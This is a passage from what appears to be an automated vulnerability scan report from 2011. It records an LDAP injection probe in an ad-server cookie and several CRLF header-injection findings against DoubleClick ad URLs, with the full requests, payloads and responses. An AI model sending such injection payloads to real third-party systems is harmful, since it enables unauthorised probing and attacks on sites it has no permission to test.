Path:   /RealMedia/ads/adstream_jx.ads/blogher.org.parenting.mybeautifulday/2011/05/pink-eye-html/@Middle,Left!Middle

Issue detail

The OAX cookie appears to be vulnerable to LDAP injection attacks.

The payloads 958f3dcd543435f8)(sn=* and 958f3dcd543435f8)!(sn=* were each submitted in the OAX cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /RealMedia/ads/adstream_jx.ads/blogher.org.parenting.mybeautifulday/2011/05/pink-eye-html/@Middle,Left!Middle?p6426&p6402&p6359&p6346&p6411&p6443&p6444&p6445&p6461&p6460&p6456&p6447&p6448&p6462&all&optanimal&optprocessedfood&optgluten&optreproductivehealth&optparenting&optformula&optmilitary&opttvfilms&optfinance&optoilauto&optantibreastfeeding&optwalmart&optdisney&optnestle&optdemocrats&optreligious&optrepublicans&optfastfood&opthouseads&optpsa&optrichmedia&url=/2011/05/pink-eye-html HTTP/1.1
Host: oascentral.blogher.org
Proxy-Connection: keep-alive
Referer: http://www.mybeautifulday.net/2011/05/pink-eye.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=958f3dcd543435f8)(sn=*; NSC_d15efm_qppm_iuuq=ffffffff09499e5745525d5f4f58455e445a4a423660

Response 1

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:36:11 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW803KrOsACm6n; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.blogher.org
Set-Cookie: RMFD=011QKBSNO2020BNt; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.blogher.org
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3241
Content-Type: application/x-javascript
Set-Cookie: NSC_d15efm_qppm_iuuq=ffffffff09419e4745525d5f4f58455e445a4a423660;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('        \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/javascript">\n');
document.write ('//<![CDATA[\n');
document.write ('var filePath = "http://imagec15.247realmedia.com/RealMedia/ads/Creatives/BlogHer/Gaylord_May11_Parenting_National/GN-Birthday-Banners-160x600.swf/1304107859";\n');
document.write ('var TFSMFlash_PRETAG = "";\n');
document.write ('var TFSMFlash_POSTTAG = "";\n');
document.write ('var TFSMFlash_VERSION = "9";\n');
document.write ('var TFSMFlash_WMODE = "window";\n');
document.write ('\n');
document.write ('            var TFSMFlash_OASCLICK = "http://oascentral.blogher.org/RealMedia/ads/click_lx.ads/blogher.org.parenting.mybeautifulday/2011/05/pink-eye-html/L36/1307121125/Middle/BlogHer/Gaylord_May11_Parenting_National/Gaylord_May11_Parenting_National_160.html/726348573830334b724f7341436d366e";\n');
document.write ('    \n');
document.write ('\n');
document.write ('\n');
document.write ('var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK + "";\n');
document.write ('var TFSMFlash_SWFFILE = filePath + TFSMFlash_SWFCLICKVARIABLE;\n');
document.write ('var TFSMFlash_FSCOMMAND = "";\n');
document.write ('var TFSMFlash_IMAGEALTERNATE = "http://imagec15.247realmedia.com/RealMedia/ads/Creatives/BlogHer/Gaylord_May11_Parenting_National/GN-Birthday-Banners-160x600.jpg/130410785
...[SNIP]...

Request 2

GET /RealMedia/ads/adstream_jx.ads/blogher.org.parenting.mybeautifulday/2011/05/pink-eye-html/@Middle,Left!Middle?p6426&p6402&p6359&p6346&p6411&p6443&p6444&p6445&p6461&p6460&p6456&p6447&p6448&p6462&all&optanimal&optprocessedfood&optgluten&optreproductivehealth&optparenting&optformula&optmilitary&opttvfilms&optfinance&optoilauto&optantibreastfeeding&optwalmart&optdisney&optnestle&optdemocrats&optreligious&optrepublicans&optfastfood&opthouseads&optpsa&optrichmedia&url=/2011/05/pink-eye-html HTTP/1.1
Host: oascentral.blogher.org
Proxy-Connection: keep-alive
Referer: http://www.mybeautifulday.net/2011/05/pink-eye.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=958f3dcd543435f8)!(sn=*; NSC_d15efm_qppm_iuuq=ffffffff09499e5745525d5f4f58455e445a4a423660

Response 2

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:36:12 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW803KrOwACrCH; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.blogher.org
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3241
Content-Type: application/x-javascript
Set-Cookie: NSC_d15efm_qppm_iuuq=ffffffff09419e4845525d5f4f58455e445a4a423660;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('        \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/javascript">\n');
document.write ('//<![CDATA[\n');
document.write ('var filePath = "http://imagec15.247realmedia.com/RealMedia/ads/Creatives/BlogHer/Gaylord_May11_Parenting_National/GN-Birthday-Banners-160x600.swf/1304107859";\n');
document.write ('var TFSMFlash_PRETAG = "";\n');
document.write ('var TFSMFlash_POSTTAG = "";\n');
document.write ('var TFSMFlash_VERSION = "9";\n');
document.write ('var TFSMFlash_WMODE = "window";\n');
document.write ('\n');
document.write ('            var TFSMFlash_OASCLICK = "http://oascentral.blogher.org/RealMedia/ads/click_lx.ads/blogher.org.parenting.mybeautifulday/2011/05/pink-eye-html/L36/1443930356/Middle/BlogHer/Gaylord_May11_Parenting_National/Gaylord_May11_Parenting_National_160.html/726348573830334b724f774143724348";\n');
document.write ('    \n');
document.write ('\n');
document.write ('\n');
document.write ('var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK + "";\n');
document.write ('var TFSMFlash_SWFFILE = filePath + TFSMFlash_SWFCLICKVARIABLE;\n');
document.write ('var TFSMFlash_FSCOMMAND = "";\n');
document.write ('var TFSMFlash_IMAGEALTERNATE = "http://imagec15.247realmedia.com/RealMedia/ads/Creatives/BlogHer/Gaylord_May11_Parenting_National/GN-Birthday-Banners-160x600.jpg/1304107859";\n');
document.write ('\n');
document.write ('\n');
document.write ('var TFSMFlash_OASALTTEXT
...[SNIP]...

4. HTTP header injection
There are 42 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://ad.doubleclick.net/ad/N5019.252469.POPSUGAR.COM/B5379556.47 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N5019.252469.POPSUGAR.COM/B5379556.47

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6e3c2%0d%0a65def4a44aa was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6e3c2%0d%0a65def4a44aa/N5019.252469.POPSUGAR.COM/B5379556.47;sz=1x1;ord=5086674? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6e3c2
65def4a44aa
/N5019.252469.POPSUGAR.COM/B5379556.47;sz=1x1;ord=5086674:
Date: Wed, 11 May 2011 15:00:19 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.doubleclick.net/ad/N6374.137661.GLAM/B5287030.24 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6374.137661.GLAM/B5287030.24

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7e8c2%0d%0a6e91c4497ec was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7e8c2%0d%0a6e91c4497ec/N6374.137661.GLAM/B5287030.24;sz=1x1;ord=4dcaa38a6d0a5? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.shefinds.com/2011/cannes-film-festival-begins-today-time-to-reflect-on-last-years-best-dressed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7e8c2
6e91c4497ec
/N6374.137661.GLAM/B5287030.24;sz=1x1;ord=4dcaa38a6d0a5:
Date: Wed, 11 May 2011 15:01:17 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.3. http://ad.doubleclick.net/ad/sugar.pop/track [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/sugar.pop/track

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 31277%0d%0a98d35675dfb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /31277%0d%0a98d35675dfb/sugar.pop/track;adv=424christinamdayscl;sz=1x1;? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/31277
98d35675dfb
/sugar.pop/track;adv=424christinamdayscl;sz=1x1;:
Date: Wed, 11 May 2011 15:00:52 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.4. http://ad.doubleclick.net/adi/N2581.rocketfuel/B5063370.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2581.rocketfuel/B5063370.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 62b57%0d%0a00d20a3e41e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /62b57%0d%0a00d20a3e41e/N2581.rocketfuel/B5063370.11;sz=160x600;ord=1305126190103;click=http://a.rfihub.com/aci/127_1_YWE9MTM4OTIsNjUwMzksMTgxMjEsMTAzNTc1NiwxMDc3LDE1NTQwLGZieVVtYWJRVXhmbixwLDc2MCwyMjE1LDQzNDgyLDI0MDgsODY3OCZyYj00NDUmcmU9MTIzODYX HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=160&h=600&re=12386&pv=0&ra=1261884890.33545748167671263&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBnJBiKaXKTfbKGcXPlQf9z7G2BNeAso8Ch8ybsyLP-5bKHAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGz7MfrA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBHmh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL5gCrBHAAgTIAs3vzw7gAgDqAghOZXdzLVNreagDAegDXugDN_UDAACAxOAEAYAG-tK9mvjwpMCkAQ%2526num%253D1%2526sig%253DAGiWqtz5uPi0ksl8IAW_-YJXgk--2xxjBA%2526client%253Dca-pub-9674942009345807%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre1261884899025&pb=&pc=&pd=&pg=&ct=1305126188489&co=false&ep=TcqlKQAGZXYK5WfFRsxn_dF6osENxyPr-Ar0pQ&ri=4dcaa529066576ae567c546cc67fd1&rs=&ai=13892&rt=15540&pe=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F&pf=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/62b57
00d20a3e41e
/N2581.rocketfuel/B5063370.11;sz=160x600;ord=1305126190103;click=http: //a.rfihub.com/aci/127_1_YWE9MTM4OTIsNjUwMzksMTgxMjEsMTAzNTc1NiwxMDc3LDE1NTQwLGZieVVtYWJRVXhmbixwLDc2MCwyMjE1LDQzNDgyLDI0MDgsODY3OCZyYj00NDUmcmU9MTIzODYX
Date: Wed, 11 May 2011 15:47:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.5. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3d32b%0d%0a24ba8ac225b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3d32b%0d%0a24ba8ac225b/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be17b%3B12fdf91fb54,0%3B%3B%3B4069427847,T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAU.uR3y8BAAAAAAAAADQ5ZWFjYzA4LTdiZGYtMTFlMC05NGQxLWJmY2FjMTZmZWUxZAAsogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,;ord=1305125976? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/getserved?T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAl0OLbOd7HUDXf52bNjMfQJdDi2znex1A13-dmzYzH0CvR-F6FK4mQByxFp8CAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxaKFW04gTCij-9.liMKLsgvXC0nquUh71W3kmAAAAAA==,,http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/&click=[CLICKURL]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3d32b
24ba8ac225b
/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http: //ad.yieldmanager.com/clk
Date: Wed, 11 May 2011 15:28:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6d52a%0d%0a5edd66f144d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6d52a%0d%0a5edd66f144d/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6d52a
5edd66f144d
/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http: //ad.burstdirectads.com/clk
Date: Wed, 11 May 2011 15:32:50 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.7. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.154173.9484049199421/B5387915.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1392d%0d%0ae1dc24a1bd9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1392d%0d%0ae1dc24a1bd9/N4682.154173.9484049199421/B5387915.3;sz=160x600;ord=1305126978042;click0=http://ad.media6degrees.com/adserv/clk?tId=17180888721769508|cId=6483|cb=1305126976|notifyPort=8080|exId=22|tId=17180888721769508|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd133.sd.pl.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3;sz=160x600;ord=1305126978042;click0=http://ad.media6degrees.com/adserv/clk?tId=17180888721769508|cId=6483|cb=1305126976|notifyPort=8080|exId=22|tId=17180888721769508|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd133.sd.pl.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1392d
e1dc24a1bd9
/N4682.154173.9484049199421/B5387915.3;sz=160x600;ord=1305126978042;click0=http: //ad.media6degrees.com/adserv/clk
Date: Wed, 11 May 2011 16:03:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.8. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5270832.35

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2131e%0d%0ad48759716a3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

